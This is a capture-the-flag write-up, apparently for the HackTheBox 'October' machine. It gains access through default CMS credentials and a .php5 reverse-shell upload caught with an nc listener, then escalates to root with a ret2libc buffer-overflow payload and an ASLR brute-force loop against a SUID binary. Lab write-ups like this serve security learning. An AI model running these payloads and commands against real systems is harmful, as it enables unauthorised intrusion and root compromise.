# Nmap 7.80 scan initiated Tue Oct 1 14:44:28 2019 as: nmap -sV -sC -O -A -oN O-Detailed -p 22,80 10.10.10.16Nmap scan report for 10.10.10.16Host is up (0.23s latency).PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)| ssh-hostkey:| 1024 79:b1:35:b6:d1:25:12:a3:0c:b5:2e:36:9c:33:26:28 (DSA)| 2048 16:08:68:51:d1:7b:07:5a:34:66:0d:4c:d0:25:56:f5 (RSA)| 256 e3:97:a7:92:23:72:bf:1d:09:88:85:b6:6c:17:4e:85 (ECDSA)|_ 256 89:85:90:98:20:bf:03:5d:35:7f:4a:a9:e1:1b:65:31 (ED25519)80/tcp open http Apache httpd 2.4.7 ((Ubuntu))| http-methods:|_ Potentially risky methods: PUT PATCH DELETE|_http-server-header: Apache/2.4.7 (Ubuntu)|_http-title: October CMS - VanillaWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portAggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.2 (92%), Linux 4.4 (92%)No exact OS matches for host (test conditions non-ideal).Network Distance: 2 hopsService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE (using port 80/tcp)HOP RTT ADDRESS1 233.02 ms 10.10.14.12 233.10 ms 10.10.10.16OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .# Nmap done at Tue Oct 1 14:44:51 2019 -- 1 IP address (1 host up) scanned in 22.95 seconds
Enumeration of the web-server ensues.
I was not able to scan for any directories as the connection kept getting timed out, this must have been due to a firewall or something. So I let it be and went ahead with manual exploitation.
It turns out it was running October CMS which is open-source and easily available on Github.
Googling a little about the CMS I came across an interesting directory and credentials.
admin:admin. So I went ahead and tried it.
Under the media section there was an option to upload files, and as per the already available file
.php5 was an acceptable extension, so I went ahead and crafted my payload
(shell.php5) and uploaded to get shell. The interface also provides with a direct link to the file, so convenient.
$ nc -lvnp 5555listening on [any] 5555 ...connect to [10.10.14.10] from (UNKNOWN) [10.10.10.16] 54046Linux october 4.4.0-78-generic #99~14.04.2-Ubuntu SMP Thu Apr 27 18:51:25 UTC 2017 i686 i686 i686 GNU/Linux15:20:03 up 3:18, 0 users, load average: 2.24, 2.85, 2.88USER TTY FROM [email protected] IDLE JCPU PCPU WHATuid=33(www-data) gid=33(www-data) groups=33(www-data)/bin/sh: 0: can't access tty; job control turned off$
$ cat /home/harry/user.txt29161***
While going through the usual enumeration I came across an unusual SUID binary file.
[*] fst010 Binaries with setuid bit........................................ yes!---/bin/umount/bin/ping/bin/fusermount/bin/su/bin/ping6/bin/mount/usr/lib/eject/dmcrypt-get-device/usr/lib/openssh/ssh-keysign/usr/lib/policykit-1/polkit-agent-helper-1/usr/lib/dbus-1.0/dbus-daemon-launch-helper/usr/bin/sudo/usr/bin/newgrp/usr/bin/pkexec/usr/bin/passwd/usr/bin/chfn/usr/bin/gpasswd/usr/bin/traceroute6.iputils/usr/bin/mtr/usr/bin/chsh/usr/bin/at/usr/sbin/pppd/usr/sbin/uuidd/usr/local/bin/ovrflw---[!] fst020 Uncommon setuid binaries........................................ yes!---/usr/local/bin/ovrflw---[!] fst030 Can we write to any setuid binary?.............................. nope
This binary accepted a command line argument string and was to be overflown to get a root shell.
Step 1: Check if
ASLR is turned on on the machine or not. Any non-zero number means that
ASLR is enabled and binary will be loaded onto different memory addresses every-time it is loaded.
$ cat /proc/sys/kernel/randomize_va_space2
Step 2: Get the binary to your own machine and check for other binary protections in place.
$ checksec --file ./ovrflw[*] '/home/jtnydv/htb-oscp/october/ovrflw'Arch: i386-32-littleRELRO: Partial RELROStack: No canary foundNX: NX enabledPIE: No PIE (0x8048000)
So we can not execute code directly off the stack as NX is enabled, so options left are
Step 3: Reverse the binary to understand what is going on. In this case I used Ghidra, you can for sure go ahead and use your own trusted disassembler.
The program was pretty simple, the
strcpy was to be exploited and in this case I chose to go ahead with
There was no write primitive for GOT overwrite.
There weren't enough
rop gadgets available for me to construct a complete
rop chain till execution and the binary was dynamically linked.
Step 4: This is not a buffer-overflow tutorial so I'll assume few things. In this step we'll find the offset and then find addresses for
libc, the one that program is using. The offset is 112 bytes.
# Getting the libc being used.$ ldd /usr/local/bin/ovrflwlinux-gate.so.1 => (0xb777d000)libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb75c3000)/lib/ld-linux.so.2 (0x80024000)# Finding memory address offset for system and exit139: 00033260 (<- HEX OFFSET) 45 FUNC GLOBAL DEFAULT 12 [email protected]@GLIBC_2.01443: 00040310 (<- HEX OFFSET) 56 FUNC WEAK DEFAULT 12 [email protected]@GLIBC_2.0# Finding memory offset for the /bin/sh string$ strings -at x /lib/i386-linux-gnu/libc.so.6 | grep "/bin/sh"162bac /bin/sh
So now we have offsets, we'll generate the exploit payload.
exit: 0xb75c3000 + 0x33260 = 0xxb75f6260system: 0xb75c3000 + 0x40310 = 0xb7603310/bin/sh: = 0xb75c3000 + 0x162bac = 0xb7725bac
So as we now, we have
ASLR turned on, so the base address of the
(0xb75c3000) will keep on changing on every load, so to circumvent this, we'll take an approach of
bruteforce, as there's no limitation on how many times this binary runs as this is an independent process in the OS.
Final exploit payload
JUNK (112) + SYSTEM + EXIT + BIN_SH_STRINGpython -c 'print "A"*112 + "\x10\x33\x60\xb7" + "\x60\x62\x5f\xb7" + "\xac\x5b\x72\xb7"'
As this payload is to be run continuously, we'll put this in a loop and run the binary and wait for a shell to pop.
while true; do /usr/local/bin/ovrflw $(python -c 'print "A"*112 + "\x10\x33\x60\xb7" + "\x60\x62\x5f\xb7" + "\xac\x5b\x72\xb7"'); done
Illegal instruction (core dumped)Segmentation fault (core dumped)ovrflw: ../iconv/skeleton.c:737: __gconv_transform_utf8_internal: Assertion `nstatus == __GCONV_FULL_OUTPUT' failed.Aborted (core dumped)Segmentation fault (core dumped)Illegal instruction (core dumped)Illegal instruction (core dumped)Segmentation fault (core dumped)Segmentation fault (core dumped)--- FAR TOO MANY SEGFAULTS ---Segmentation fault (core dumped)Segmentation fault (core dumped)iduid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)cat /root/root.txt6bcb9***
Googling around about the tool you are dealing with is an essential step in understanding vectors and potential areas of compromise and buffer overflows are fun.